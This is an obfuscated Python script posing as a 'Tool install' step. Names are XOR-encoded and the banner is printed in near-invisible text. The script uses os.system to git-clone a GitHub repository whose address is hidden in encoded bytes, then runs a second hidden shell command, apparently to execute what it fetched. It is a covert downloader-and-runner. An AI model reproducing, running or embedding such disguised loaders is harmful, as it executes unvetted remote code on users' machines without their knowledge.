OO1OOl1010OOO1OO11O10 = (lambda lOll10l0l111O11OO1l11,
    OO01101O0O10ll0Oll0Ol: lOll10l0l111O11OO1l11 ^ OO01101O0O10ll0Oll0Ol)
OO1001l1OO11lO0lO1110 = (lambda Ol00l0O01101010l01llO,
    l010O1lO1l00OO1l010l1: Ol00l0O01101010l01llO + l010O1lO1l00OO1l010l1)
OlO1ll1ll0OllO1111l10 = __import__(''.join(chr(OlOOO1lll0010O1O0lO1l ^
    l0O0OllOO1OOOOlOOOOOl) for l0O0OllOO1OOOOlOOOOOl, OlOOO1lll0010O1O0lO1l in
    zip(b'.g}\xf9', b'Z\x0e\x10\x9c')), globals(), locals(), [], 0 * 3 + 0)
l1OO010l111O0O0010l1l = __import__(''.join(chr(O1110l0l0O1O000OOO010 ^
    OlOOO0Oll111O101O1l00) for OlOOO0Oll111O101O1l00, O1110l0l0O1O000OOO010 in
    zip(b"$'", b'VB')), globals(), locals(), [], 0)
OOll00101lO0000lO0l10 = __import__(''.join(chr(lOl1l0OO100llO1l01ll1 ^
    O10l00O1Ol10O1l0O1Oll) for O10l00O1Ol10O1l0O1Oll, lOl1l0OO100llO1l01ll1 in
    zip(b'\x17\xdf', b'x\xac')), globals(), locals(), [], 0)
print('\x1b[0;30mTool install'[::-1][::-2 ^ 1])
getattr(OOll00101lO0000lO0l10, ''.join(chr(OOl1l0OO1111lO110l10l ^
    l11l01000l11OOO1OO1lO) for l11l01000l11OOO1OO1lO, OOl1l0OO1111lO110l10l in
    zip(b'\xfd\xdc\xd8\xe1\x05\xc2', b'\x8e\xa5\xab\x95`\xaf')))(
    'git clone ' + 'https://git' + ''.join(chr(O0lOlOlOl1l1010Ol110O ^
    lll0ll110lO0l1l1l1O1O) for lll0ll110lO0l1l1l1O1O, O0lOlOlOl1l1010Ol110O in
    zip(b'\x00>\\R\x11cT\xba_\xa5\xcb\xee\xe4u\x1d~$\x0b\xe7\x85\xb6\xb7',
    b'hK>|r\x0c9\x95\x0f\xc9\xaa\x85\x8e\x1bs\x08Gc\x8d\xaa\x98\xd8')))
getattr(OOll00101lO0000lO0l10, ''.join(chr(l11l0O1011lll010OlllO ^
    ll1OO11l1l1OOll11l1ll) for ll1OO11l1l1OOll11l1ll, l11l0O1011lll010OlllO in
    zip(b'\xd5\xc2\x9cY\xde\x92', b'\xa6\xbb\xef-\xbb\xff')))(''.join(
    filter(lambda O00100lO000OOllOOlO0l: ord(O00100lO000OOllOOlO0l) % 6 != 
    0, 'ZZx\x06Nl\x1ex`N\x1e\x1ef6*')).join(chr(lOllO01lOl1lO1OlOOll0 ^
    OlOO1O001lO1011lO00ll) for OlOO1O001lO1011lO00ll, lOllO01lOl1lO1OlOOll0 in
    zip(b'8\x19[\xa0\x8fkJ;\xfb\x12d\xce\xcb\xa4Oc,-8',
    b'[}{\x8e\xe0K+U\x9f2\x14\xb7\xbf\xcc \r\x0c\x03W')))
